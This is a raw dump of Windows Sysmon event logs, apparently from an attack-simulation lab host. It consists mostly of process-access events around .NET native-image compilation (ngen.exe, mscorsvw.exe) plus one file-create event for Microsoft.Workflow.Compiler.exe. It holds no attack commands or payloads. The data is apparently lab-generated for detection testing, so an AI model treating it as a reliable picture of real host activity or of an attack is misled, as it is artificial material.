13:50:16.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-D003-00000000A301}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.775{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-D003-00000000A301}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:16.775{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-D003-00000000A301}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:16.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-CF03-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.681{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-CF03-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:16.681{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-CF03-00000000A301}3176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.978{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-DC03-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.962{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-DC03-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.962{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-DC03-00000000A301}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.931{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-DB03-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.915{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-DB03-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.915{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-DB03-00000000A301}3728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.853{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-DA03-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.837{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-DA03-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-DA03-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.790{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D903-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.790{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D903-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.790{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D903-00000000A301}812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:50:17.728{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\2e4-0\Microsoft.Workflow.Compiler.exe2021-01-18 13:50:17.728 10341000x80000000000000008107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.619{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.603{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.603{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9219-6005-D803-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:17.353{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9219-6005-D703-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:17.337{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9219-6005-D703-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
